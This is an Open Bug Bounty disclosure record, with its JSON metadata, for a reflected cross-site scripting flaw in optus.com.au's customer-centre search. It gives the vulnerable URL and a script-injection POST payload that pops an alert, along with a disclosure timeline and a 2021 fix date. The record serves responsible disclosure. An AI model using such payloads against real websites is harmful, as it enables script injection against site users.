Following the coordinated and responsible vulnerability disclosure guidelines of the **[ISO 29147](<https://www.iso.org/standard/45170.html>)** standard, Open Bug Bounty has:
a. verified the vulnerability and confirmed its existence;
b. notified the website operator about its existence.
Affected Website:| **[optus.com.au](<https://www.optus.com.au>) **
---|---
Open Bug Bounty Program:| **Create your bounty program now**. It's open and free.
Vulnerable Application:| Custom Code
Vulnerability Type:| **[XSS (Cross Site Scripting)](<https://owasp.org/www-community/attacks/xss/>)** / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Discovered and Reported by:| **tbm **
Remediation Guide:| **[OWASP XSS Prevention Cheat Sheet](<https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html>)**
Vulnerable URL:
https: //www. optus.com.au/customercentre/search
---
HTTP POST data:
query=</script><script>alert ( 'XSSPOSED')</script>&question=
---
**Screenshot:** 
**Mirror:** [Click here to view the mirror](<http://120110.openbounty.org/mirror/>)
### Coordinated Disclosure Timeline
Vulnerability Reported:| 25 December, 2015 08:55 GMT
---|---
Vulnerability Verified:| 25 December, 2015 08:57 GMT
Website Operator Notified:| 25 December, 2015 08:57 GMT
a. Using publicly available security contacts| 
---|---
b. Using Open Bug Bounty notification framework| 
c. Using security contacts provided by the researcher| 
Public Report Published [without technical details]:| 25 December, 2015 08:57 GMT
Vulnerability Fixed:| 17 November, 2021 00:52 GMT
---|---
{"id": "OBB:120110", "vendorId": null, "type": "openbugbounty", "bulletinFamily": "bugbounty", "title": "optus.com.au Cross Site Scripting vulnerability OBB-120110 ", "description": "Following the coordinated and responsible vulnerability disclosure guidelines of the **[ISO 29147](<https://www.iso.org/standard/45170.html>)** standard, Open Bug Bounty has: \n\na. verified the vulnerability and confirmed its existence; \nb. notified the website operator about its existence.\n\nAffected Website:| **[optus.com.au](<https://www.optus.com.au>) ** \n---|--- \nOpen Bug Bounty Program:| **Create your bounty program now**. It's open and free. \nVulnerable Application:| Custom Code \nVulnerability Type:| **[XSS (Cross Site Scripting)](<https://owasp.org/www-community/attacks/xss/>)** / CWE-79 \nCVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N] \nDiscovered and Reported by:| **tbm ** \nRemediation Guide:| **[OWASP XSS Prevention Cheat Sheet](<https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html>)** \n \nVulnerable URL:\n\nhttps: //www. optus.com.au/customercentre/search \n--- \n \nHTTP POST data:\n\nquery=</script><script>alert ( 'XSSPOSED')</script>&question= \n--- \n \n**Screenshot:** \n\n**Mirror:** [Click here to view the mirror](<http://120110.openbounty.org/mirror/>)\n\n### Coordinated Disclosure Timeline\n\nVulnerability Reported:| 25 December, 2015 08:55 GMT \n---|--- \nVulnerability Verified:| 25 December, 2015 08:57 GMT \nWebsite Operator Notified:| 25 December, 2015 08:57 GMT \na. Using publicly available security contacts|  \n---|--- \nb. Using Open Bug Bounty notification framework|  \nc. Using security contacts provided by the researcher|  \nPublic Report Published [without technical details]:| 25 December, 2015 08:57 GMT \nVulnerability Fixed:| 17 November, 2021 00:52 GMT \n---|---\n", "published": "2015-12-25T08:55:00", "modified": "2016-01-24T08:55:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.openbugbounty.org/reports/120110/", "reporter": "tbm", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-11-17T01:37:02", "viewCount": 3, "enchantments": {"score": {"value": -0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.2}, "openbugbounty": {"patchStatus": "patched", "mirror": "http://120110.openbounty.org/mirror/"}, "_state": {"dependencies": 1645324649, "score": 1659783552}}